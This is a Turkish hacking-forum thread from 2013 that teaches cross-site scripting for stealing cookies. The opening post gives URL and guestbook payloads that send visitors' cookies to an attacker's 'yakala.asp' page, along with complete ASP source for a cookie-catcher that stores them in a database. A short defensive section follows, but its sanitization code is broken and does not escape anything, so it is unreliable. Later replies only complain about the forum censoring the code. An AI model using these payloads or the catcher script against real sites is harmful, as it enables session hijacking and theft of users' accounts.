THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

XSS Hacking Geniş Anlatımlı

HackerTrojan - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2013
Nereden:
system32
Mesajlar:
1.098
Konular:
164
Teşekkür (Etti):
9
Teşekkür (Aldı):
148
Ticaret:
(0) %
10-06-2013 18:10
#1
XSS Hacking Geniş Anlatımlı
Merhaba

Kod:
XSS Açıkları Request ile kullanıcıdan alınan verilerin sayfa içinde Yazdırılması ile oluşur. Örneğin QueryString ile alınan sayfa numaraları yada ilgili kaydı gösteren id değişkenleri.

hedefsite/Default.Asp?Page=1 yada
hedefsite/Product.Asp?id=1
hedefsite/Default.Asp?Kategori=Haber gibi.

Örnek XSS Açığı ile Ne yapılabilir :

Yukardaki örnekler gibi açığımızı buluyoruz yada hedef sitede Webservis sayaç kodunun olması yeterli.
Açığımızı bulduktan sonra kullanıcının Cookie'sini JavaScript (********.cookie) ile okuyup istediğimiz bir adresteki veri tabanına kayıt ediyoruz yada kendimize mail atıyoruz.

-------------------------
hedefsite.com/Default.Asp?Page=2">******************.href='http://www.siteadi.com/yakala.asp?X='+escape(********.cookie)</SCRIPT>
-------------------------

Saldırgan Url’nin sonuna "> Eklentisi ile Inputların sonlandırılmasını ve bundan sonra eklenen zararlı kodları Explorer’ın icra etmesini sağlar.

Bu Link’e tıklayan kullanıcının Cookie’si Belirtilen Kaynağa Post edilir.

Yada : Hedef sitede yazdığınız mesajı gösterebilecek uygulamalar var ise ziyaretçi defteri, forum vb. uygulama
----------------------------
******************.********='http://www.siteismi.com/yakala.asp?X=' +********.cookie</script>
----------------------------
Bu kod ilgili sayfada görüntülendiği anda sayfayı görüntüleyen kullanıcıların cookielerini alarak yakala.asp dosyasına veri tabanına kaydetmesi için gönderir.

Web Sayfanızda XSS açıkları kapatılmış Olsada, Webservis Sayac kodu var ise bu sayesinde XSS Açığı Oluşuyor.
WebServis Tarafından verilen ve Sitenize eklediğiniz;

------------------------------------
<script language="javascript"> var wuser="Kulaniciismi", wbanner=11;</script>
<script language="javascript" src= "a target=_blank href=http://www.webservis.gen">http://www.webservis.gen.tr/sayac.js"></script>
-------------------------------------

XSS Açıklarını Engellemek için:

Request ile alınan değerleri her zaman QueryString’de olsa Replace ile Aşağıdaki şekilde temizleyin

Ve Request verilerini alırken mutlaka tam sayıya çevirin

Recid = CInt(Trim(Server.HTMLEncode("Recid")))

Recid = Replace(Recid, "<" , "<") ’küçüktür
Recid = Replace(Recid, ">" , ">") ’büyüktür
Recid = Replace(Recide, "’" , "’") ’tek tırnak
Recid = Replace(Recid, Chr(10) , "") ’Satır Başı
Recid = Replace(Recid, Chr(34) , "") ’çift tırnak

---------------------------------------------------

ASP.NET ’de

web.config Dosyasında aşağıdaki değişikleri yaptığınızda " ’ "

gibi karakterleri sistem kendisi kontrol eder. Bu Sayede hemen hemen hiçbir XSS ve SQL Enjeksiyon teknikleri Etkili olmaz

<System.Web>
<Pages validateRequest="True"></Pages>
</System.Web>

IPS Kullanıyor iseniz

Yeni imza yaratıp

Application Layer / HTTP / HTTP.URL_DECODED
Protokolüne;

’ Tek Tırnak,
" Çift Tırnak
< Küçük
> Büyük

Karakterlerini ekleyerek XSS ve SQL Enjeksiyon Saldırılarını Direkt Engelleyebilirsiniz...

----------------------------------------------------------------------------------

Yakala.ASP’den Gelen Verileri yakalamak ve Veritabanına kaydetmek için

Örnek Basit bir ASP Dosyası

X = Request.QueryString("X") Yerine
Veri URL’den geleceği için
X = Request.ServerVariables("HTTP_REFERER") de Kullanabilirsiniz.

"Yakala.mdb" adında bir database oluşturun "tblYakala" adında bir tablo ve "Sayfa" Adında (alan tipi Not) Oalcak şekilde Tasarlayın

--------------------Yakala.Asp-----------------------------------

<%
Dim X
X = Request.QueryString("X")
%>

<%
Dim ConnString,bag
ConnString = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & server.mappath("Yakala.mdb") & ";"
set bag = Server.CreateObject("ADODB.Connection")
bag.Open ConnString
%>

<%
Dim SQL,Rs
Set Rs=Server.CreateObject("ADODB.Recordset")
SQL="Select * From tblYakala"
Rs.Open SQL,ConnString,1,3
End iF
%>

<%
Rs.AddNew
Rs("Sayfa")=X
Rs.Update
Rs.Close
%>
---------------------
[SIGPIC]http://p1308.hizliresim.com/1d/4/r3udm.gif[/SIGPIC]Beyninizin yapabileceklerini hayal bile edemezsiniz, onu kısıtlamayın.
Konu HackerTrojan tarafından (11-06-2013 22:27 Saat 22:27 ) değiştirilmiştir.
PYRITHIONEs - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2013
Mesajlar:
2.321
Konular:
247
Teşekkür (Etti):
598
Teşekkür (Aldı):
668
Ticaret:
(0) %
10-06-2013 18:38
#2
Kardeşim forumda kim bu konuyu açtıysa copy paste öle değilse bile hepsi *** böle
kod içine alsanıza.
HackerTrojan - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2013
Nereden:
system32
Mesajlar:
1.098
Konular:
164
Teşekkür (Etti):
9
Teşekkür (Aldı):
148
Ticaret:
(0) %
10-06-2013 19:24
#3
Alıntı:
PYRITHIONE1999´isimli üyeden Alıntı Mesajı göster
Kardeşim forumda kim bu konuyu açtıysa copy paste öle değilse bile hepsi *** böle
kod içine alsanıza.
Onun nedeki forumda sansur olmasidir a mk gibi kufurlerin *** seklinde cikmasindan kaynaklaniyor.
---------------------
[SIGPIC]http://p1308.hizliresim.com/1d/4/r3udm.gif[/SIGPIC]Beyninizin yapabileceklerini hayal bile edemezsiniz, onu kısıtlamayın.
PYRITHIONEs - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2013
Mesajlar:
2.321
Konular:
247
Teşekkür (Etti):
598
Teşekkür (Aldı):
668
Ticaret:
(0) %
10-06-2013 20:42
#4
Alıntı:
HackerTrojan´isimli üyeden Alıntı Mesajı göster
Onun nedeki forumda sansur olmasidir a mk gibi kufurlerin *** seklinde cikmasindan kaynaklaniyor.
Biliyorum ama konuyu düzenle.
Kod:
BU ŞEKİL YAP O ZAMAN SANSÜR OLMAZ BÜTÜN KODLARI BÖLE DÜZENLE HEPSİNİ KOD İÇİNE AL
Konuyu sil bence düzenleyincei lk bana pm YOLLA.
ÇÜNKÜ ADAM GİBİ KAYNAK YOK.Ben biliyorum fakat bu şekilde bile kaynak yok.bazı abiler sayesinde öğrendim XXSYİ.İnşallah düzenlersin.DÜZENLEERSEN SÜPER OLUR.
DÜZENLERSEN İLK TEŞEKKÜR BENDEN.
Konu PYRITHIONEs tarafından (10-06-2013 20:45 Saat 20:45 ) değiştirilmiştir.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler